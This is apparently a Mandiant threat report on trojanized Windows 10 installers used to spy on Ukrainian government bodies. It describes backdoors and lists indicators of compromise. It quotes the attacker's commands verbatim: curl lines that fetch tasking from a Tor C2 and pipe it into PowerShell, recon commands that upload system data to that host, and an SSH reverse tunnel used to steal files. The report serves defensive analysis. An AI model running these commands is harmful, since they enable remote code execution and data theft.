Executive Summary
- Mandiant identified an operation focused on the Ukrainian government via trojanized Windows 10 Operating System installers. These were distributed via torrent sites in a supply chain attack.
- Threat activity tracked as UNC4166 likely trojanized and distributed malicious Windows Operating system installers which drop malware that conducts reconnaissance and deploys additional capability on some victims to conduct data theft.
- The trojanized files use the Ukrainian language pack and are designed to target Ukrainian users. Following compromise targets selected for follow on activity included multiple Ukrainian government organizations.
- At this time, Mandiant does not have enough information to attribute UNC4166 to a sponsor or previously tracked group. However, UNC4166’s targets overlap with organizations targeted by GRU related clusters with wipers at the outset of the war.
Threat Detail
Mandiant uncovered a socially engineered supply chain operation focused on Ukrainian government entities that leveraged trojanized ISO files masquerading as legitimate Windows 10 Operating System installers. The trojanized ISOs were hosted on Ukrainian- and Russian-language torrent file sharing sites. Upon installation of the compromised software, the malware gathers information on the compromised system and exfiltrates it. At a subset of victims, additional tools are deployed to enable further intelligence gathering. In some instances, we discovered additional payloads that were likely deployed following initial reconnaissance including the STOWAWAY, BEACON, and SPAREPART backdoors.
- One trojanized ISO “Win10_21H2_Ukrainian_x64.iso” (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4) uses the Ukrainian Language pack and could be downloaded from “https://toloka[.]to/t657016#1873175.” The Toloka site is focused on a Ukrainian audience and the image uses the Ukrainian language (Figure 1).
- The same ISO was observed being hosted on a Russian torrent tracker (https://rutracker[.]net/forum/viewtopic.php?t=6271208) using the same image.
- The ISO contained malicious scheduled tasks that were altered and identified on multiple systems at three different Ukrainian organizations beaconing to .onion TOR domains beginning around mid-July 2022.
Attribution and Targeting
Mandiant is tracking this cluster of threat activity as UNC4166. We believe that the operation was intended to target Ukrainian entities, due to the language pack used and the website used to distribute it. The use of trojanized ISOs is novel in espionage operations and included anti-detection capabilities indicates that the actors behind this activity are security conscious and patient, as the operation would have required a significant time and resources to develop and wait for the ISO to be installed on a network of interest.
Mandiant has not uncovered links to previously tracked activity, but believes the actor behind this operation has a mandate to steal information from the Ukrainian government.
- The organizations where UNC4166 conducted follow on interactions included organizations that were historically victims of disruptive wiper attacks that we associate with APT28 since the outbreak of the invasion.
- This ISO was originally hosted on a Ukrainian torrent tracker called toloka.to by an account “Isomaker” which was created on the May 11, 2022.
- The ISO was configured to disable the typical security telemetry a Windows computer would send to Microsoft and block automatic updates and license verification.
- There was no indication of a financial motivation for the intrusions, either through the theft of monetizable information or the deployment of ransomware or cryptominers.
Outlook and Implications
Supply chain operations can be leveraged for broad access, as in the case of NotPetya, or the ability to discreetly select high value targets of interest, as in the SolarWinds incident. These operations represent a clear opportunity for operators to get to hard targets and carry out major disruptive attack which may not be contained to conflict zone.
For more research from Google Cloud on securing the supply chain, see this Perspectives on Security report.
Technical Annex
Mandiant identified several devices within Ukrainian Government networks which contained malicious scheduled tasks that communicated to a TOR website from around July 12th, 2022. These scheduled tasks act as a lightweight backdoor that retrieves tasking via HTTP requests to a given command and control (C2) server. The responses are then executed via PowerShell. From data collated by Mandiant, it appears that victims are selected by the threat actor for further tasking.
In some instances, we discovered devices had additional payloads that we assess were deployed following initial reconnaissance of the users including the deployment of the STOWAWAY and BEACON backdoors.
- STOWAWAY is a publicly available backdoor and proxy. The project supports several types of communication like SSH, socks5. Backdoor component supports upload and download of files, remote shell and basic information gathering.
- BEACON is a backdoor written in C/C++ that is part of the Cobalt Strike framework. Supported backdoor commands include shell command execution, file transfer, file execution, and file management. BEACON can also capture keystrokes and screenshots as well as act as a proxy server. BEACON may also be tasked with harvesting system credentials, port scanning, and enumerating systems on a network. BEACON communicates with a C2 server via HTTP or DNS.
The threat actor also began to deploy secondary toehold backdoors in the environment including SPAREPART, likely as a means of redundancy for the initial PowerShell bootstraps.
- SPAREPART is a lightweight backdoor written in C that uses the device’s UUID as a unique identifier for communications with the C2. Upon successful connection to a C2, SPAREPART will download the tasking and execute it through a newly created process.
Details
Infection Vector
Mandiant identified multiple installations of a trojanized ISO, which masquerades as a legitimate Windows 10 installer using the Ukrainian Language pack with telemetry settings disabled. We assess that the threat actor distributed these installers publicly, and then used an embedded schedule task to determine whether the victim should have further payloads deployed.
- Win10_21H2_Ukrainian_x64.iso (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4)
- Malicious trojanized Windows 10 installer
- Downloaded from https://toloka.to/t657016#1873175
Forensic analysis on the ISO identified the changes made by UNC4166 that enables the threat actor to perform additional triage of victim accounts:
Modification of the GatherNetworkInfo and Consolidator Schedule Tasks
The ISO contained altered GatherNetworkInfo and Consolidator schedule tasks, which added a secondary action that executed the PowerShell downloader action. Both scheduled tasks are legitimate components of Windows and execute the gatherNetworkInfo.vbs script or waqmcons.exe process.
The altered tasks both contained a secondary action that was responsible for executing a PowerShell command. This command makes use of the curl binary to download a command from the C2 server, then the command is executed through PowerShell.
The C2 servers in both instances were addresses to TOR gateways. These gateways advertise as a mechanism for users to access TOR from the standard internet (onion.moe, onion.ws).
These tasks act as the foothold access into compromised networks, allowing UNC4166 to conduct reconnaissance on the victim device to determine networks of value for follow on threat activity.
Based on forensic analysis of the ISO file, Mandiant identified that the compromised tasks were both edited as follows:
- C:WindowsSystem32TasksMicrosoftWindowsCustomer Experience Improvement ProgramConsolidator (MD5: ed7ab9c74aad08b938b320765b5c380d)
- Last edit date: 2022-05-11 12:58:55
- Executes: powershell.exe (curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H (‘h:’+(wmic csproduct get UUID)))
- C:WindowsSystem32TasksMicrosoftWindowsNetTraceGatherNetworkInfo (MD5: 1433dd88edfc9e4b25df370c0d8612cf)
- Last edit date: 2022-05-11 12:58:12
- Executes: powershell.exe curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion.ws -H (‘h:’+(wmic csproduct get UUID)) | powershell.exe
Note: At the time of analysis, the onion[.]ws C2 server is redirecting requests to legitimate websites.
Software Piracy Script
The ISO contained an additional file not found in standard Windows distributions called SetupComplete.cmd. SetupComplete is a Windows batch script that is configured to be executed upon completion of the Windows installation but before the end user is able to use the device. The script appears to be an amalgamation of multiple public scripts including remove_MS_telemetry.cmd by DeltoidDelta and activate.cmd by Poudyalanil (originally wiredroid) with the addition of a command to disable OneDriveSetup which was not identified in either script.
The script is responsible for disabling several legitimate Windows services and tasks, disabling Windows updates, blocking IP addresses and domains related to legitimate Microsoft services, disabling OneDrive and activating the Windows license.
Forensic artifacts led Mandiant to identify three additional scripts that were historically on the image, we assess that over time the threat actor has made alterations to these files.
- SetupComplete.cmd (MD5: 84B54D2D022D3DF9340708B992BF6669)
- Batch script to disable legitimate services and activate Windows
- File currently hosted on ISO
- SetupComplete.cmd (MD5: 67C4B2C45D4C5FD71F6B86FA0C71BDD3)
- Batch script to disable legitimate services and activate Windows
- File recovered through forensic file carving
- SetupComplete.cmd (MD5: 5AF96E2E31A021C3311DFDA200184A3B)
- Batch script to disable legitimate services and activate Windows
- File recovered through forensic file carving
Victim Identification
Mandiant assesses that the threat actor performs initial triage of compromised devices, likely to determine whether the victims were of interest. This triage takes place using the trojanized schedule tasks. In some cases, the threat actor may deploy additional capability for data theft or new persistence backdoors, likely for redundancy in the cases of SPAREPART or to enable additional tradecraft with BEACON and STOWAWAY.
The threat actor likely uses the device’s UUID as a unique identifier to track victims. This unique identifier is transferred as a header in all HTTP requests both to download tasking and upload stolen data/responses.
The threat actor’s playbook appears to follow a distinct pattern:
- Execute a command
- Optionally, filter or expand the results
- Export the results to CSV using the Export-Csv command and write to the path sysinfo (%system32%sysinfo)
- Optionally, compress the data into sysinfo.zip (%system32%sysinfo.zip)
- Optionally, upload the data instantaneously to the C2 (in most cases this is a separate task that is executed at the next beacon).
Mandiant identified the threat actor exfiltrate data containing system information data, directory listings including timestamps and device geo-location. A list of commands used can be found in the indicators section.
Interestingly, we did uncover a command that didn’t fit the aforementioned pattern in at least one instance. This command was executed on at least one device where the threat actor had access for several weeks.
- curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H h:filefile-file-file-file-filefilefile –output temp.zip
Although we were not able to discover evidence that temp.zip was executed or recover the file, we were able to identify the content of the file directly from the C2 during analysis. This command is likely an alternative mechanism for the threat actor to collect the system information for the current victim, although it’s unclear why they wouldn’t deploy the command directly..
- chcp 65001; [console]::outputencoding = [system.text.encoding]::UTF8; Start-Process powershell -argument “Get-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8” -wait -nonewwindow; curl.exe -H (‘h:’+(wmic csproduct get UUID)) –data-binary “@sysinfo” -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe; rm sysinfo
The download command is notable as the threat actor uses a hardcoded UUID (filefile-file-file-file-filefilefile), which we assess is likely a default value. It’s unclear why the threat actor performed this additional request in favor of downloading the command itself; we believe this may be used as a default command by the threat actors.
Follow On Tasking
If UNC4166 determined a device likely contained intelligence of value, subsequent actions were take on these devices. Based on our analysis, the subsequent tasking fall into three categories:
- Deployment of tools to enable exfiltration of data (like TOR and Sheret)
- Deployment of additional lightweight backdoors likely to provide redundant access to the target (like SPAREPART)
- Deployment of additional backdoors to enable additional functionality (like BEACON and STOWAWAY)
TOR Browser Downloaded
In some instances, Mandiant identified that the threat actor attempted to download the TOR browser onto the victim’s device. This was originally attempted through downloading the file directly from the C2 via curl. However, the following day the actor also downloaded a second TOR installer directly from the official torprojects.org website.
It’s unclear why the threat actor performed these actions as Mandiant was unable to identify any use of TOR on the victim device, although this would provide the actor a second route to communicate with infrastructure through TOR or may be used by additional capability as a route for exfiltration.
We also discovered the TOR installer was also hosted on some of the backup infrastructure, which may indicate the C2 URLs resolve to the same device.
- bundle.zip (MD5: 66da9976c96803996fc5465decf87630)
- Legitimate TOR Installer bundle
- Downloaded from https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe/bundle.zip
- Downloaded from https:// 56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid.onion[.]moe/bundle.zip
Use of Sheret HTTP Server and localhost[.]run
In some instances, the threat actor deployed a publicly available HTTP server called Sheret to conduct data theft interactively on victim devices. The threat actor configured Sheret to server locally, then using SSH created a tunnel from the local device to the service localhost[.]run.
In at least one instance, this web server was used for serving files on a removable drive connected to the victim device and Mandiant was able to confirm that multiple files were exfiltrated via this mechanism.
The command used for SSH tunnelling was:
- ssh -R 80:localhost:80 -i defaultssh localhost[.]run -o stricthostkeychecking=no >> sysinfo
This command configures the local system to create a tunnel from the local device to the website localhost.run.
- C:WindowsSystem32HTTPDService.exe (MD5: a0d668eec4aebaddece795addda5420d)
- Sheret web server
- Publicly available as a build from https://github.com/ethanpil/sheret
- Compiled date: 1970/01/01 00:00:00
Deployment of SPAREPART, Likely as a Redundant Backdoor
We identified the creation of a service following initial recon that we believe was the deployment of a redundant backdoor we call SPAREPART. The service named “Microsoft Delivery Network” was created to execute %SYSTEM32%MicrosoftDeliveryNetworkMicrosoftDeliveryCenter with the arguments “56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid.onion[.]moe powershell.exe” via the Windows SC command.
Functionally SPAREPART is identical to the PowerShell backdoors that were deployed via the schedule tasks in the original ISOs. SPAREPART is executed as a Windows Service DLL, which upon execution will receive the tasking and execute via piping the commands into the PowerShell process.
SPAREPART will parse the raw SMIBOS firmware table via the Windows GetSystemFirmwareTable, this code is nearly identical to code published by Microsoft on Github. The code’s purpose is to obtain the UUID of the device, which is later formatted into the same header (h: <UUID) for use in communications with the C2 server.
The payload parses the arguments provided on the command line. Interestingly there is an error in this parsing. If the threat actor provides a single argument to the payload, that argument is used as the URL and tasking can be downloaded. However, if the second command (in our instance powershell.exe) is missing, the payload will later attempt to create a process with an invalid argument which will mean that the payload is unable to execute commands provided by the threat actor.
SPAREPART has a unique randomization for its sleep timer. This enables the threat actor to randomise beaconing timing. The randomisation is seeded of the base address of the image in memory, this value is then used to determine a value between 0 and 59. This value acts as the sleep timer in minutes. As the backdoor starts up, it’ll sleep for up to 59 minutes before reaching out to the C2. Any subsequent requests will be delayed for between 3 and 4 hours.
If after 10 sleeps the payload has received no tasking (30-40 hours of delays), the payload will terminate until the service is next executed.
After the required sleep timer has been fulfilled, the payload will attempt to download a command using the provided URL. The payload attempts to download tasking using the WinHttp set of APIs and the hard coded user agent “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0”. The payload attempts to perform a GET request using the previously formatted headers, providing the response is a valid status (200), the data will be read and written to a previously created pipe.
If a valid response is obtained from the C2 server, the payload will create a new process using the second argument (powershell.exe) and pipe the downloaded commands as the standard input. The payload makes no attempt to return the response to the actor, similarly to the PowerShell backdoor.
Although we witnessed the installation of this backdoor, the threat actor reverted to the PowerShell backdoor for tasking a couple of hours later. Due to the similarities in the payloads and the fact the threat actor reverted to the PowerShell backdoor, we believe that SPAREPART is a redundant backdoor likely to be used if the threat actor loses access to the original schedule tasks.
- MicrosoftDeliveryCenter (MD5: f9cd5b145e372553dded92628db038d8)
- SPAREPART backdoor
- Compiled on: 2022/11/28 02:32:33
- PDB path: C:UsersuserDesktopImageAgentImageAgentPreAgentsrcbuilderagent.pdb
Deployment of Additional Backdoors
In addition to the deployment of SPAREPART, the threat actor also deployed additional backdoors on some limited devices. In early September, UNC4166 deployed the payload AzureSettingSync.dll and configured its execution via a schedule task named AzureSync on at least one device. The schedule task was configured to execute AzureSync via rundll32.exe.
AzureSettingSync is a BEACON payload configured to communicate with cdnworld.org, which was registered on the June 24, 2022 with an SSL certificate from Let’s Encrypt dated the 26th of August 2022.
- C:WindowsSystem32AzureSettingSync.dll (MD5: 59a3129b73ba4756582ab67939a2fe3c)
- BEACON backdoor
- Original name: tr2fe.dll
- Compiled on: 1970/01/01 00:00:00
- Dropped by 529388109f4d69ce5314423242947c31 (BEACON)
- Connects to https://cdnworld[.]org/34192–general-feedback/suggestions/35703616-cdn–
- Connects to https://cdnworld[.]org/34702–general/sync/42823419-cdn
Due to remediation on some compromised devices, we believe that the BEACON instances were quarantined on the devices. Following this, we identified the threat actor had deployed a STOWAWAY backdoor on the victim device.
- C:WindowsSystem32splwow86.exe (MD5: 0f06afbb4a2a389e82de6214590b312b)
- STOWAWAY backdoor
- Compiled on: 1970/01/01 00:00:00
- Connects to 193.142.30.166:443
- %LOCALAPPDATA%SODUsvc.exe (MD5: a8e7d8ec0f450037441ee43f593ffc7c)
- STOWAWAY backdoor
- Compiled on: 1970/01/01 00:00:00
- Connects to 91.205.230.66:8443
Indicators
Scheduled Tasks
- C:WindowsSystem32TasksMicrosoftWindowsNotificationCenter (MD5: 16b21091e5c541d3a92fb697e4512c6d)
- Schedule task configured to execute Powershell.exe with the command line curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H (‘h:’+(wmic csproduct get UUID)) | powershell
Trojanized Scheduled Tasks
- C:WindowsSystem32TasksMicrosoftWindowsNetTraceGatherNetworkInfo (MD5: 1433dd88edfc9e4b25df370c0d8612cf)
- C:WindowsSystem32TasksMicrosoftWindowsCustomer Experience Improvement ProgramConsolidator (MD5: ed7ab9c74aad08b938b320765b5c380d)
BEACON Backdoor
- C:WindowsSystem32AzureSettingSync.dll (MD5: 59a3129b73ba4756582ab67939a2fe3c)
Scheduled Tasks for Persistence
- C:WindowsSystem32TasksMicrosoftWindowsMaintenanceAzureSync
- C:WindowsSystem32TasksMicrosoftWindowsMaintenanceAzureSyncDaily
STOWAWAY Backdoor
- C:WindowsSystem32splwow86.exe (MD5: 0f06afbb4a2a389e82de6214590b312b)
- %LOCALAPPDATA%SODUsvc.exe (MD5: a8e7d8ec0f450037441ee43f593ffc7c)
Services for Persistence
- Printer driver host for applications
- SODUsvc
On Host Recon Commands
- Get-ChildItem -Recurse -Force -Path ((C:)+’’) | Select-Object -Property Psdrive, FullName, Length, Creationtime, lastaccesstime, lastwritetime | Export-Csv -Path sysinfo -encoding UTF8; Compress-Archive -Path sysinfo -DestinationPath sysinfo.zip -Force;
- Get-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8
- invoke-restmethod http://ip-api[.]com/json | Export-Csv -path sysinfo -encoding UTF8
- Get-Volume | Where-Object {.DriveLetter -and .DriveLetter -ne ‘C’ -and .DriveType -eq ‘Fixed’} | ForEach-Object {Get-ChildItem -Recurse -Directory (.DriveLetter+‘:’) | Select-Object -Property Psdrive, FullName, Length, Creationtime, lastaccesstime, lastwritetime | Export-Csv -Path sysinfo -encoding UTF8; Compress-Archive -Path sysinfo -DestinationPath sysinfo -Force; curl.exe -H (’h:’+(wmic csproduct get UUID)) –data-binary ‘@sysinfo.zip’ -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe
- chcp 65001; [console]::outputencoding = [system.text.encoding]::UTF8; Start-Process powershell -argument “Get-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8” -wait -nonewwindow; curl.exe -H (‘h:’+(wmic csproduct get UUID)) –data-binary “@sysinfo” -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe; rm sysinfo
Trojanized Windows Image Network Indicators
Indicators of Compromise |
Signature |
56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid[.]onion[.]moe |
Malicious Windows Image Tor C2 |
ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion[.]moe |
Malicious Windows Image Tor C2 |
ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion[.]ws |
Malicious Windows Image Tor C2 |
BEACON C2s
- https://cdnworld[.]org/34192–general-feedback/suggestions/35703616-cdn–
- https://cdnworld[.]org/34702–general/sync/42823419-cdn
STOWAWAY C2s
- 193.142.30[.]166:443
- 91.205.230[.]66:8443
Appendix
MITRE ATT&CK Framework
Detection Rules
strings: |
|
Source: https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government